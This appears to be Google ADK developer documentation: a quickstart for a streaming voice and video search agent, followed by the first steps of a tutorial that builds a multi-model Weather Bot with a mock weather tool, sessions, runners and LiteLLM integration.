Streaming for ADK enables developers to create agents capable of low-latency, bidirectional voice and video communication, enhancing interactive experiences.
The article demonstrates that text streaming is a built-in feature of ADK Agents, requiring no additional specific code, while also showcasing how to implement live audio conversations for real-time voice interaction with an agent. This allows for more natural and dynamic communication, as users can speak to and hear from the agent seamlessly.

# Build a streaming agent with Python

With this quickstart, you'll learn to create a simple agent and use ADK Streaming to enable low-latency, bidirectional voice and video communication with it. We will install ADK, set up a basic "Google Search" agent, try running the agent with Streaming using the `adk web` tool, and then explain how to build a simple asynchronous web app yourself using ADK Streaming and [FastAPI](https://fastapi.tiangolo.com/).

**Note:** This guide assumes you have experience using a terminal in Windows, macOS, or Linux environments.

## Supported models for voice/video streaming

To use voice/video streaming in ADK, you need a Gemini model that supports the Live API. You can find the **model ID(s)** that support the Gemini Live API in the documentation:

- [Google AI Studio: Gemini Live API](https://ai.google.dev/gemini-api/docs/models#live-api)
- [Vertex AI: Gemini Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api)

## 1. Setup Environment & Install ADK

Create & Activate Virtual Environment (Recommended):

```bash
# Create
python -m venv .venv
# Activate (each new terminal)
# macOS/Linux: source .venv/bin/activate
# Windows CMD: .venv\Scripts\activate.bat
# Windows PowerShell: .venv\Scripts\Activate.ps1
```

Install ADK:

```bash
pip install google-adk
```

## 2. Project Structure

Create the following folder structure with empty files:

```console
adk-streaming/  # Project folder
└── app/ # the web app folder
    ├── .env # Gemini API key
    └── google_search_agent/ # Agent folder
        ├── __init__.py # Python package
        └── agent.py # Agent definition
```

### agent.py

Copy-paste the following code block into the `agent.py` file.

For `model`, please double check the model ID as described earlier in the [Models section](#supported-models).

```py
from google.adk.agents import Agent
from google.adk.tools import google_search  # Import the tool

root_agent = Agent(
   # A unique name for the agent.
   name="basic_search_agent",
   # The Large Language Model (LLM) that agent will use.
   # Please fill in the latest model id that supports live from
   # https://google.github.io/adk-docs/get-started/streaming/quickstart-streaming/#supported-models
   model="...",
   # A short description of the agent's purpose.
   description="Agent to answer questions using Google Search.",
   # Instructions to set the agent's behavior.
   instruction="You are an expert researcher. You always stick to the facts.",
   # Add google_search tool to perform grounding with Google search.
   tools=[google_search]
)
```

`agent.py` is where all your agent(s)' logic will be stored, and you must have a `root_agent` defined.

Notice how easily you integrated [grounding with Google Search](https://ai.google.dev/gemini-api/docs/grounding?lang=python#configure-search) capabilities. The `Agent` class and the `google_search` tool handle the complex interactions with the LLM and grounding with the search API, allowing you to focus on the agent's *purpose* and *behavior*.

Copy-paste the following code block into the `__init__.py` file.

`__init__.py`

```py
from . import agent
```

## 3. Set up the platform

To run the agent, choose a platform from either Google AI Studio or Google Cloud Vertex AI:

**Google AI Studio**

1. Get an API key from [Google AI Studio](https://aistudio.google.com/apikey).

1. Open the **`.env`** file located inside (`app/`) and copy-paste the following code.

   .env

   ```text
   GOOGLE_GENAI_USE_VERTEXAI=FALSE
   GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_API_KEY_HERE
   ```

1. Replace `PASTE_YOUR_ACTUAL_API_KEY_HERE` with your actual API key.

**Google Cloud Vertex AI**

1. You need an existing [Google Cloud](https://cloud.google.com/?e=48754805&hl=en) account and a project.

   - Set up a [Google Cloud project](https://cloud.google.com/vertex-ai/generative-ai/docs/start/quickstarts/quickstart-multimodal#setup-gcp)
   - Set up the [gcloud CLI](https://cloud.google.com/vertex-ai/generative-ai/docs/start/quickstarts/quickstart-multimodal#setup-local)
   - Authenticate to Google Cloud from the terminal by running `gcloud auth login`.
   - [Enable the Vertex AI API](https://console.cloud.google.com/flows/enableapi?apiid=aiplatform.googleapis.com).

1. Open the **`.env`** file located inside (`app/`). Copy-paste the following code and update the project ID and location.

   .env

   ```text
   GOOGLE_GENAI_USE_VERTEXAI=TRUE
   GOOGLE_CLOUD_PROJECT=PASTE_YOUR_ACTUAL_PROJECT_ID
   GOOGLE_CLOUD_LOCATION=us-central1
   ```

## 4. Try the agent with `adk web`

The agent is now ready to try. Before launching the **dev UI**, make sure the current directory is `app`:

```shell
cd app
```

Also, set the `SSL_CERT_FILE` variable with the following command. This is required for the voice and video tests later.

```bash
export SSL_CERT_FILE=$(python -m certifi)
```

```powershell
$env:SSL_CERT_FILE = (python -m certifi)
```

Then, run the dev UI:

```shell
adk web
```

Note for Windows users

If you hit the `_make_subprocess_transport NotImplementedError`, consider using `adk web --no-reload` instead.

Caution: ADK Web for development only

ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only.

Open the URL provided (usually `http://localhost:8000` or `http://127.0.0.1:8000`) **directly in your browser**.
This connection stays entirely on your local machine. Select `google_search_agent`.

### Try with voice and video

To try with voice, reload the web browser, click the microphone button to enable voice input, and ask the following questions aloud. The agent will use the `google_search` tool to get the latest information to answer those questions. You will hear the answer spoken in real time.

- What is the weather in New York?
- What is the time in New York?
- What is the weather in Paris?
- What is the time in Paris?

To try with video, reload the web browser, click the camera button to enable video input, and ask questions like "What do you see?". The agent will describe what it sees in the video input.

#### Caveat

- You cannot use text chat with the native-audio models. You will see errors when entering text messages on `adk web`.

### Stop the tool

Stop `adk web` by pressing `Ctrl-C` on the console.

### Note on ADK Streaming

The following features will be supported in future versions of ADK Streaming: Callback, LongRunningTool, ExampleTool, and Shell agent (e.g. SequentialAgent).

Congratulations! You've successfully created and interacted with your first Streaming agent using ADK!

## Next steps: build custom streaming app

The [Bidi-streaming development guide series](https://google.github.io/adk-docs/streaming/dev-guide/part1/index.md) gives an overview of the server and client code for a custom asynchronous web app built with ADK Streaming, enabling real-time, bidirectional audio and text communication.

# Build your agent with ADK

Get started with the Agent Development Kit (ADK) through our collection of practical guides. These tutorials are designed in a simple, progressive, step-by-step fashion, introducing you to different ADK features and capabilities.

This approach allows you to learn and build incrementally – starting with foundational concepts and gradually tackling more advanced agent development techniques.
You'll explore how to apply these features effectively across various use cases, equipping you to build your own sophisticated agentic applications with ADK. Explore our collection below and happy building:

- **Multi-tool agent**

  ______________________________________________________________________

  Create a workflow that uses multiple tools.

  [Build a multi-tool agent](https://google.github.io/adk-docs/get-started/quickstart/index.md)

- **Agent team**

  ______________________________________________________________________

  Build a multi-agent workflow including agent delegation, session management, and safety callbacks.

  [Build an agent team](https://google.github.io/adk-docs/tutorials/agent-team/index.md)

- **Streaming agent**

  ______________________________________________________________________

  Create an agent for handling streamed content.

  [Build a streaming agent](https://google.github.io/adk-docs/get-started/streaming/index.md)

- **Discover sample agents**

  ______________________________________________________________________

  Discover sample agents for retail, travel, customer service, and more!

  [Discover adk-samples](https://github.com/google/adk-samples)

# Build Your First Intelligent Agent Team: A Progressive Weather Bot with ADK

This tutorial extends from the [Quickstart example](https://google.github.io/adk-docs/get-started/quickstart/) for [Agent Development Kit](https://google.github.io/adk-docs/get-started/).

Now, you're ready to dive deeper and construct a more sophisticated, **multi-agent system**.

We'll embark on building a **Weather Bot agent team**, progressively layering advanced features onto a simple foundation. Starting with a single agent that can look up weather, we will incrementally add capabilities like:

- Leveraging different AI models (Gemini, GPT, Claude).
- Designing specialized sub-agents for distinct tasks (like greetings and farewells).
- Enabling intelligent delegation between agents.
- Giving agents memory using persistent session state. - Implementing crucial safety guardrails using callbacks. **Why a Weather Bot Team?** This use case, while seemingly simple, provides a practical and relatable canvas to explore core ADK concepts essential for building complex, real-world agentic applications. You'll learn how to structure interactions, manage state, ensure safety, and orchestrate multiple AI "brains" working together. **What is ADK Again?** As a reminder, ADK is a Python framework designed to streamline the development of applications powered by Large Language Models (LLMs). It offers robust building blocks for creating agents that can reason, plan, utilize tools, interact dynamically with users, and collaborate effectively within a team. **In this advanced tutorial, you will master:** - ✅ **Tool Definition & Usage:** Crafting Python functions (`tools`) that grant agents specific abilities (like fetching data) and instructing agents on how to use them effectively. - ✅ **Multi-LLM Flexibility:** Configuring agents to utilize various leading LLMs (Gemini, GPT-4o, Claude Sonnet) via LiteLLM integration, allowing you to choose the best model for each task. - ✅ **Agent Delegation & Collaboration:** Designing specialized sub-agents and enabling automatic routing (`auto flow`) of user requests to the most appropriate agent within a team. - ✅ **Session State for Memory:** Utilizing `Session State` and `ToolContext` to enable agents to remember information across conversational turns, leading to more contextual interactions. - ✅ **Safety Guardrails with Callbacks:** Implementing `before_model_callback` and `before_tool_callback` to inspect, modify, or block requests/tool usage based on predefined rules, enhancing application safety and control. **End State Expectation:** By completing this tutorial, you will have built a functional multi-agent Weather Bot system. 
This system will not only provide weather information but also handle conversational niceties, remember the last city checked, and operate within defined safety boundaries, all orchestrated using ADK. **Prerequisites:** - ✅ **Solid understanding of Python programming.** - ✅ **Familiarity with Large Language Models (LLMs), APIs, and the concept of agents.** - ❗ **Crucially: Completion of the ADK Quickstart tutorial(s) or equivalent foundational knowledge of ADK basics (Agent, Runner, SessionService, basic Tool usage).** This tutorial builds directly upon those concepts. - ✅ **API Keys** for the LLMs you intend to use (e.g., Google AI Studio for Gemini, OpenAI Platform, Anthropic Console). ______________________________________________________________________ **Note on Execution Environment:** This tutorial is structured for interactive notebook environments like Google Colab, Colab Enterprise, or Jupyter notebooks. Please keep the following in mind: - **Running Async Code:** Notebook environments handle asynchronous code differently. You'll see examples using `await` (suitable when an event loop is already running, common in notebooks) or `asyncio.run()` (often needed when running as a standalone `.py` script or in specific notebook setups). The code blocks provide guidance for both scenarios. - **Manual Runner/Session Setup:** The steps involve explicitly creating `Runner` and `SessionService` instances. This approach is shown because it gives you fine-grained control over the agent's execution lifecycle, session management, and state persistence. **Alternative: Using ADK's Built-in Tools (Web UI / CLI / API Server)** If you prefer a setup that handles the runner and session management automatically using ADK's standard tools, you can find the equivalent code structured for that purpose [here](https://github.com/google/adk-docs/tree/main/examples/python/tutorial/agent_team/adk-tutorial). 
That version is designed to be run directly with commands like `adk web` (for a web UI), `adk run` (for CLI interaction), or `adk api_server` (to expose an API). Please follow the `README.md` instructions provided in that alternative resource. ______________________________________________________________________ **Ready to build your agent team? Let's dive in!** > **Note:** This tutorial works with adk version 1.0.0 and above ```python # @title Step 0: Setup and Installation # Install ADK and LiteLLM for multi-model support !pip install google-adk -q !pip install litellm -q print("Installation complete.") ``` ```python # @title Import necessary libraries import os import asyncio from google.adk.agents import Agent from google.adk.models.lite_llm import LiteLlm # For multi-model support from google.adk.sessions import InMemorySessionService from google.adk.runners import Runner from google.genai import types # For creating message Content/Parts import warnings # Ignore all warnings warnings.filterwarnings("ignore") import logging logging.basicConfig(level=logging.ERROR) print("Libraries imported.") ``` ```python # @title Configure API Keys (Replace with your actual keys!) 
# --- IMPORTANT: Replace placeholders with your real API keys --- # Gemini API Key (Get from Google AI Studio: https://aistudio.google.com/app/apikey) os.environ["GOOGLE_API_KEY"] = "YOUR_GOOGLE_API_KEY" # <--- REPLACE # [Optional] # OpenAI API Key (Get from OpenAI Platform: https://platform.openai.com/api-keys) os.environ['OPENAI_API_KEY'] = 'YOUR_OPENAI_API_KEY' # <--- REPLACE # [Optional] # Anthropic API Key (Get from Anthropic Console: https://console.anthropic.com/settings/keys) os.environ['ANTHROPIC_API_KEY'] = 'YOUR_ANTHROPIC_API_KEY' # <--- REPLACE # --- Verify Keys (Optional Check) --- print("API Keys Set:") print(f"Google API Key set: {'Yes' if os.environ.get('GOOGLE_API_KEY') and os.environ['GOOGLE_API_KEY'] != 'YOUR_GOOGLE_API_KEY' else 'No (REPLACE PLACEHOLDER!)'}") print(f"OpenAI API Key set: {'Yes' if os.environ.get('OPENAI_API_KEY') and os.environ['OPENAI_API_KEY'] != 'YOUR_OPENAI_API_KEY' else 'No (REPLACE PLACEHOLDER!)'}") print(f"Anthropic API Key set: {'Yes' if os.environ.get('ANTHROPIC_API_KEY') and os.environ['ANTHROPIC_API_KEY'] != 'YOUR_ANTHROPIC_API_KEY' else 'No (REPLACE PLACEHOLDER!)'}") # Configure ADK to use API keys directly (not Vertex AI for this multi-model setup) os.environ["GOOGLE_GENAI_USE_VERTEXAI"] = "False" # @markdown **Security Note:** It's best practice to manage API keys securely (e.g., using Colab Secrets or environment variables) rather than hardcoding them directly in the notebook. Replace the placeholder strings above. ``` ```python # --- Define Model Constants for easier use --- # More supported models can be referenced here: https://ai.google.dev/gemini-api/docs/models#model-variations MODEL_GEMINI_2_5_FLASH = "gemini-2.5-flash" # More supported models can be referenced here: https://docs.litellm.ai/docs/providers/openai#openai-chat-completion-models MODEL_GPT_4O = "openai/gpt-4.1" # You can also try: gpt-4.1-mini, gpt-4o etc. 
# More supported models can be referenced here: https://docs.litellm.ai/docs/providers/anthropic MODEL_CLAUDE_SONNET = "anthropic/claude-sonnet-4-20250514" # You can also try: claude-opus-4-20250514 , claude-3-7-sonnet-20250219 etc print("\nEnvironment configured.") ``` ______________________________________________________________________ ## Step 1: Your First Agent - Basic Weather Lookup Let's begin by building the fundamental component of our Weather Bot: a single agent capable of performing a specific task – looking up weather information. This involves creating two core pieces: 1. **A Tool:** A Python function that equips the agent with the *ability* to fetch weather data. 1. **An Agent:** The AI "brain" that understands the user's request, knows it has a weather tool, and decides when and how to use it. ______________________________________________________________________ **1. Define the Tool (`get_weather`)** In ADK, **Tools** are the building blocks that give agents concrete capabilities beyond just text generation. They are typically regular Python functions that perform specific actions, like calling an API, querying a database, or performing calculations. Our first tool will provide a *mock* weather report. This allows us to focus on the agent structure without needing external API keys yet. Later, you could easily swap this mock function with one that calls a real weather service. **Key Concept: Docstrings are Crucial!** The agent's LLM relies heavily on the function's **docstring** to understand: - *What* the tool does. - *When* to use it. - *What arguments* it requires (`city: str`). - *What information* it returns. **Best Practice:** Write clear, descriptive, and accurate docstrings for your tools. This is essential for the LLM to use the tool correctly. ```python # @title Define the get_weather Tool def get_weather(city: str) -> dict: """Retrieves the current weather report for a specified city. 
Args: city (str): The name of the city (e.g., "New York", "London", "Tokyo"). Returns: dict: A dictionary containing the weather information. Includes a 'status' key ('success' or 'error'). If 'success', includes a 'report' key with weather details. If 'error', includes an 'error_message' key. """ print(f"--- Tool: get_weather called for city: {city} ---") # Log tool execution city_normalized = city.lower().replace(" ", "") # Basic normalization # Mock weather data mock_weather_db = { "newyork": {"status": "success", "report": "The weather in New York is sunny with a temperature of 25°C."}, "london": {"status": "success", "report": "It's cloudy in London with a temperature of 15°C."}, "tokyo": {"status": "success", "report": "Tokyo is experiencing light rain and a temperature of 18°C."}, } if city_normalized in mock_weather_db: return mock_weather_db[city_normalized] else: return {"status": "error", "error_message": f"Sorry, I don't have weather information for '{city}'."} # Example tool usage (optional test) print(get_weather("New York")) print(get_weather("Paris")) ``` ______________________________________________________________________ **2. Define the Agent (`weather_agent`)** Now, let's create the **Agent** itself. An `Agent` in ADK orchestrates the interaction between the user, the LLM, and the available tools. We configure it with several key parameters: - `name`: A unique identifier for this agent (e.g., "weather_agent_v1"). - `model`: Specifies which LLM to use (e.g., `MODEL_GEMINI_2_5_FLASH`). We'll start with a specific Gemini model. - `description`: A concise summary of the agent's overall purpose. This becomes crucial later when other agents need to decide whether to delegate tasks to *this* agent. - `instruction`: Detailed guidance for the LLM on how to behave, its persona, its goals, and specifically *how and when* to utilize its assigned `tools`. 
- `tools`: A list containing the actual Python tool functions the agent is allowed to use (e.g., `[get_weather]`). **Best Practice:** Provide clear and specific `instruction` prompts. The more detailed the instructions, the better the LLM can understand its role and how to use its tools effectively. Be explicit about error handling if needed. **Best Practice:** Choose descriptive `name` and `description` values. These are used internally by ADK and are vital for features like automatic delegation (covered later). ```python # @title Define the Weather Agent # Use one of the model constants defined earlier AGENT_MODEL = MODEL_GEMINI_2_5_FLASH # Starting with Gemini weather_agent = Agent( name="weather_agent_v1", model=AGENT_MODEL, # Can be a string for Gemini or a LiteLlm object description="Provides weather information for specific cities.", instruction="You are a helpful weather assistant. " "When the user asks for the weather in a specific city, " "use the 'get_weather' tool to find the information. " "If the tool returns an error, inform the user politely. " "If the tool is successful, present the weather report clearly.", tools=[get_weather], # Pass the function directly ) print(f"Agent '{weather_agent.name}' created using model '{AGENT_MODEL}'.") ``` ______________________________________________________________________ **3. Setup Runner and Session Service** To manage conversations and execute the agent, we need two more components: - `SessionService`: Responsible for managing conversation history and state for different users and sessions. The `InMemorySessionService` is a simple implementation that stores everything in memory, suitable for testing and simple applications. It keeps track of the messages exchanged. We'll explore state persistence more in Step 4. - `Runner`: The engine that orchestrates the interaction flow. 
It takes user input, routes it to the appropriate agent, manages calls to the LLM and tools based on the agent's logic, handles session updates via the `SessionService`, and yields events representing the progress of the interaction. ```python # @title Setup Session Service and Runner # --- Session Management --- # Key Concept: SessionService stores conversation history & state. # InMemorySessionService is simple, non-persistent storage for this tutorial. session_service = InMemorySessionService() # Define constants for identifying the interaction context APP_NAME = "weather_tutorial_app" USER_ID = "user_1" SESSION_ID = "session_001" # Using a fixed ID for simplicity # Create the specific session where the conversation will happen session = await session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) print(f"Session created: App='{APP_NAME}', User='{USER_ID}', Session='{SESSION_ID}'") # --- OR --- # Uncomment the following lines if running as a standard Python script (.py file): # async def init_session(app_name:str,user_id:str,session_id:str) -> InMemorySessionService: # session = await session_service.create_session( # app_name=app_name, # user_id=user_id, # session_id=session_id # ) # print(f"Session created: App='{app_name}', User='{user_id}', Session='{session_id}'") # return session # # session = asyncio.run(init_session(APP_NAME,USER_ID,SESSION_ID)) # --- Runner --- # Key Concept: Runner orchestrates the agent execution loop. runner = Runner( agent=weather_agent, # The agent we want to run app_name=APP_NAME, # Associates runs with our app session_service=session_service # Uses our session manager ) print(f"Runner created for agent '{runner.agent.name}'.") ``` ______________________________________________________________________ **4. Interact with the Agent** We need a way to send messages to our agent and receive its responses. Since LLM calls and tool executions can take time, ADK's `Runner` operates asynchronously. 
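To make the asynchronous pattern concrete before wiring it to ADK, here is a minimal, standard-library-only sketch of consuming a stream of events with `async for`. The names `FakeEvent`, `fake_run_async`, and `collect_final` are hypothetical stand-ins invented for this illustration; they are not part of ADK and only mimic the general shape of "yield intermediate events, then a final one".

```python
import asyncio
from dataclasses import dataclass
from typing import AsyncIterator


@dataclass
class FakeEvent:
    """Hypothetical stand-in for an event; not the real ADK Event class."""
    text: str
    final: bool = False


async def fake_run_async(query: str) -> AsyncIterator[FakeEvent]:
    """Hypothetical stand-in for a runner: yields intermediate steps, then a final answer."""
    yield FakeEvent(text=f"tool call requested for: {query}")
    await asyncio.sleep(0.01)  # Simulates waiting on an LLM or tool (I/O-bound)
    yield FakeEvent(text="tool result received")
    await asyncio.sleep(0.01)
    yield FakeEvent(text=f"final answer for: {query}", final=True)


async def collect_final(query: str) -> str:
    """Consumes the event stream and returns the text of the final event."""
    final_text = "no final response"
    async for event in fake_run_async(query):
        if event.final:
            final_text = event.text
            break
    return final_text


async def demo() -> list:
    # Both queries wait on their simulated I/O concurrently;
    # neither blocks the other while it is sleeping.
    return await asyncio.gather(collect_final("London"), collect_final("Paris"))


# In a standalone script. In a notebook with a running event loop,
# use `results = await demo()` instead.
results = asyncio.run(demo())
print(results)
```

The point of the sketch is only the control flow: the caller iterates over events as they arrive and picks out the one marked as final, while the event loop stays free to make progress on other work during each wait.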
We'll define an `async` helper function (`call_agent_async`) that: 1. Takes a user query string. 1. Packages it into the ADK `Content` format. 1. Calls `runner.run_async`, providing the user/session context and the new message. 1. Iterates through the **Events** yielded by the runner. Events represent steps in the agent's execution (e.g., tool call requested, tool result received, intermediate LLM thought, final response). 1. Identifies and prints the **final response** event using `event.is_final_response()`. **Why `async`?** Interactions with LLMs and potentially tools (like external APIs) are I/O-bound operations. Using `asyncio` allows the program to handle these operations efficiently without blocking execution. ```python # @title Define Agent Interaction Function from google.genai import types # For creating message Content/Parts async def call_agent_async(query: str, runner, user_id, session_id): """Sends a query to the agent and prints the final response.""" print(f"\n>>> User Query: {query}") # Prepare the user's message in ADK format content = types.Content(role='user', parts=[types.Part(text=query)]) final_response_text = "Agent did not produce a final response." # Default # Key Concept: run_async executes the agent logic and yields Events. # We iterate through events to find the final answer. async for event in runner.run_async(user_id=user_id, session_id=session_id, new_message=content): # You can uncomment the line below to see *all* events during execution # print(f" [Event] Author: {event.author}, Type: {type(event).__name__}, Final: {event.is_final_response()}, Content: {event.content}") # Key Concept: is_final_response() marks the concluding message for the turn. 
if event.is_final_response(): if event.content and event.content.parts: # Assuming text response in the first part final_response_text = event.content.parts[0].text elif event.actions and event.actions.escalate: # Handle potential errors/escalations final_response_text = f"Agent escalated: {event.error_message or 'No specific message.'}" # Add more checks here if needed (e.g., specific error codes) break # Stop processing events once the final response is found print(f"<<< Agent Response: {final_response_text}") ``` ______________________________________________________________________ **5. Run the Conversation** Finally, let's test our setup by sending a few queries to the agent. We wrap our `async` calls in a main `async` function and run it using `await`. Watch the output: - See the user queries. - Notice the `--- Tool: get_weather called... ---` logs when the agent uses the tool. - Observe the agent's final responses, including how it handles the case where weather data isn't available (for Paris). ```python # @title Run the Initial Conversation # We need an async function to await our interaction helper async def run_conversation(): await call_agent_async("What is the weather like in London?", runner=runner, user_id=USER_ID, session_id=SESSION_ID) await call_agent_async("How about Paris?", runner=runner, user_id=USER_ID, session_id=SESSION_ID) # Expecting the tool's error message await call_agent_async("Tell me the weather in New York", runner=runner, user_id=USER_ID, session_id=SESSION_ID) # Execute the conversation using await in an async context (like Colab/Jupyter) await run_conversation() # --- OR --- # Uncomment the following lines if running as a standard Python script (.py file): # import asyncio # if __name__ == "__main__": # try: # asyncio.run(run_conversation()) # except Exception as e: # print(f"An error occurred: {e}") ``` ______________________________________________________________________ Congratulations! 
You've successfully built and interacted with your first ADK agent. It understands the user's request, uses a tool to find information, and responds appropriately based on the tool's result.

In the next step, we'll explore how to easily switch the underlying Language Model powering this agent.

## Step 2: Going Multi-Model with LiteLLM [Optional]

In Step 1, we built a functional Weather Agent powered by a specific Gemini model. While effective, real-world applications often benefit from the flexibility to use *different* Large Language Models (LLMs). Why?

- **Performance:** Some models excel at specific tasks (e.g., coding, reasoning, creative writing).
- **Cost:** Different models have varying price points.
- **Capabilities:** Models offer diverse features, context window sizes, and fine-tuning options.
- **Availability/Redundancy:** Having alternatives ensures your application remains functional even if one provider experiences issues.

ADK makes switching between models seamless through its integration with the [**LiteLLM**](https://github.com/BerriAI/litellm) library. LiteLLM acts as a consistent interface to over 100 different LLMs.

**In this step, we will:**

1. Learn how to configure an ADK `Agent` to use models from providers like OpenAI (GPT) and Anthropic (Claude) using the `LiteLlm` wrapper.
1. Define, configure (with their own sessions and runners), and immediately test instances of our Weather Agent, each backed by a different LLM.
1. Interact with these different agents to observe potential variations in their responses, even when using the same underlying tool.

______________________________________________________________________

**1. Import `LiteLlm`**

We imported this during the initial setup (Step 0), but it's the key component for multi-model support:

```python
# @title 1. Import LiteLlm
from google.adk.models.lite_llm import LiteLlm
```

**2. Define and Test Multi-Model Agents**

Instead of passing only a model name string (which defaults to Google's Gemini models), we wrap the desired model identifier string within the `LiteLlm` class.

- **Key Concept: `LiteLlm` Wrapper:** The `LiteLlm(model="provider/model_name")` syntax tells ADK to route requests for this agent through the LiteLLM library to the specified model provider.

Make sure you have configured the necessary API keys for OpenAI and Anthropic in Step 0. We'll use the `call_agent_async` function (defined earlier, which now accepts `runner`, `user_id`, and `session_id`) to interact with each agent immediately after its setup.

Each block below will:

- Define the agent using a specific LiteLLM model (`MODEL_GPT_4O` or `MODEL_CLAUDE_SONNET`).
- Create a *new, separate* `InMemorySessionService` and session specifically for that agent's test run. This keeps the conversation histories isolated for this demonstration.
- Create a `Runner` configured for the specific agent and its session service.
- Immediately call `call_agent_async` to send a query and test the agent.

**Best Practice:** Use constants for model names (like `MODEL_GPT_4O`, `MODEL_CLAUDE_SONNET` defined in Step 0) to avoid typos and make code easier to manage.

**Error Handling:** We wrap the agent definitions in `try...except` blocks. This prevents the entire code cell from failing if an API key for a specific provider is missing or invalid, allowing the tutorial to proceed with the models that *are* configured.

First, let's create and test the agent using OpenAI's GPT-4o.

```python
# @title Define and Test GPT Agent

# Make sure 'get_weather' function from Step 1 is defined in your environment.
# Make sure 'call_agent_async' is defined from earlier.

# --- Agent using GPT-4o ---
weather_agent_gpt = None  # Initialize to None
runner_gpt = None         # Initialize runner to None

try:
    weather_agent_gpt = Agent(
        name="weather_agent_gpt",
        # Key change: Wrap the LiteLLM model identifier
        model=LiteLlm(model=MODEL_GPT_4O),
        description="Provides weather information (using GPT-4o).",
        instruction="You are a helpful weather assistant powered by GPT-4o. "
                    "Use the 'get_weather' tool for city weather requests. "
                    "Clearly present successful reports or polite error messages based on the tool's output status.",
        tools=[get_weather],  # Re-use the same tool
    )
    print(f"Agent '{weather_agent_gpt.name}' created using model '{MODEL_GPT_4O}'.")

    # InMemorySessionService is simple, non-persistent storage for this tutorial.
    session_service_gpt = InMemorySessionService()  # Create a dedicated service

    # Define constants for identifying the interaction context
    APP_NAME_GPT = "weather_tutorial_app_gpt"  # Unique app name for this test
    USER_ID_GPT = "user_1_gpt"
    SESSION_ID_GPT = "session_001_gpt"  # Using a fixed ID for simplicity

    # Create the specific session where the conversation will happen
    session_gpt = await session_service_gpt.create_session(
        app_name=APP_NAME_GPT,
        user_id=USER_ID_GPT,
        session_id=SESSION_ID_GPT
    )
    print(f"Session created: App='{APP_NAME_GPT}', User='{USER_ID_GPT}', Session='{SESSION_ID_GPT}'")

    # Create a runner specific to this agent and its session service
    runner_gpt = Runner(
        agent=weather_agent_gpt,
        app_name=APP_NAME_GPT,               # Use the specific app name
        session_service=session_service_gpt  # Use the specific session service
    )
    print(f"Runner created for agent '{runner_gpt.agent.name}'.")

    # --- Test the GPT Agent ---
    print("\n--- Testing GPT Agent ---")
    # Ensure call_agent_async uses the correct runner, user_id, session_id
    await call_agent_async(query="What's the weather in Tokyo?",
                           runner=runner_gpt,
                           user_id=USER_ID_GPT,
                           session_id=SESSION_ID_GPT)

    # --- OR ---

    # Uncomment the following lines if running as a standard Python script (.py file):

    # import asyncio
    # if __name__ == "__main__":
    #     try:
    #         asyncio.run(call_agent_async(query="What's the weather in Tokyo?",
    #                                      runner=runner_gpt,
    #                                      user_id=USER_ID_GPT,
    #                                      session_id=SESSION_ID_GPT))
    #     except Exception as e:
    #         print(f"An error occurred: {e}")

except Exception as e:
    print(f"❌ Could not create or run GPT agent '{MODEL_GPT_4O}'. Check API Key and model name. Error: {e}")
```

Next, we'll do the same for Anthropic's Claude Sonnet.

```python
# @title Define and Test Claude Agent

# Make sure 'get_weather' function from Step 1 is defined in your environment.
# Make sure 'call_agent_async' is defined from earlier.

# --- Agent using Claude Sonnet ---
weather_agent_claude = None  # Initialize to None
runner_claude = None         # Initialize runner to None

try:
    weather_agent_claude = Agent(
        name="weather_agent_claude",
        # Key change: Wrap the LiteLLM model identifier
        model=LiteLlm(model=MODEL_CLAUDE_SONNET),
        description="Provides weather information (using Claude Sonnet).",
        instruction="You are a helpful weather assistant powered by Claude Sonnet. "
                    "Use the 'get_weather' tool for city weather requests. "
                    "Analyze the tool's dictionary output ('status', 'report'/'error_message'). "
                    "Clearly present successful reports or polite error messages.",
        tools=[get_weather],  # Re-use the same tool
    )
    print(f"Agent '{weather_agent_claude.name}' created using model '{MODEL_CLAUDE_SONNET}'.")

    # InMemorySessionService is simple, non-persistent storage for this tutorial.
    session_service_claude = InMemorySessionService()  # Create a dedicated service

    # Define constants for identifying the interaction context
    APP_NAME_CLAUDE = "weather_tutorial_app_claude"  # Unique app name
    USER_ID_CLAUDE = "user_1_claude"
    SESSION_ID_CLAUDE = "session_001_claude"  # Using a fixed ID for simplicity

    # Create the specific session where the conversation will happen
    session_claude = await session_service_claude.create_session(
        app_name=APP_NAME_CLAUDE,
        user_id=USER_ID_CLAUDE,
        session_id=SESSION_ID_CLAUDE
    )
    print(f"Session created: App='{APP_NAME_CLAUDE}', User='{USER_ID_CLAUDE}', Session='{SESSION_ID_CLAUDE}'")

    # Create a runner specific to this agent and its session service
    runner_claude = Runner(
        agent=weather_agent_claude,
        app_name=APP_NAME_CLAUDE,               # Use the specific app name
        session_service=session_service_claude  # Use the specific session service
    )
    print(f"Runner created for agent '{runner_claude.agent.name}'.")

    # --- Test the Claude Agent ---
    print("\n--- Testing Claude Agent ---")
    # Ensure call_agent_async uses the correct runner, user_id, session_id
    await call_agent_async(query="Weather in London please.",
                           runner=runner_claude,
                           user_id=USER_ID_CLAUDE,
                           session_id=SESSION_ID_CLAUDE)

    # --- OR ---

    # Uncomment the following lines if running as a standard Python script (.py file):

    # import asyncio
    # if __name__ == "__main__":
    #     try:
    #         asyncio.run(call_agent_async(query="Weather in London please.",
    #                                      runner=runner_claude,
    #                                      user_id=USER_ID_CLAUDE,
    #                                      session_id=SESSION_ID_CLAUDE))
    #     except Exception as e:
    #         print(f"An error occurred: {e}")

except Exception as e:
    print(f"❌ Could not create or run Claude agent '{MODEL_CLAUDE_SONNET}'. Check API Key and model name. Error: {e}")
```

Observe the output carefully from both code blocks. You should see:

1. Each agent (`weather_agent_gpt`, `weather_agent_claude`) is created successfully (if API keys are valid).
1. A dedicated session and runner are set up for each.
1. Each agent correctly identifies the need to use the `get_weather` tool when processing the query (you'll see the `--- Tool: get_weather called... ---` log).
1. The *underlying tool logic* remains identical, always returning our mock data.
1. However, the **final textual response** generated by each agent might differ slightly in phrasing, tone, or formatting. This is because the instruction prompt is interpreted and executed by different LLMs (GPT-4o vs. Claude Sonnet).

This step demonstrates the power and flexibility ADK + LiteLLM provide. You can easily experiment with and deploy agents using various LLMs while keeping your core application logic (tools, fundamental agent structure) consistent.

In the next step, we'll move beyond a single agent and build a small team where agents can delegate tasks to each other!

______________________________________________________________________

## Step 3: Building an Agent Team - Delegation for Greetings & Farewells

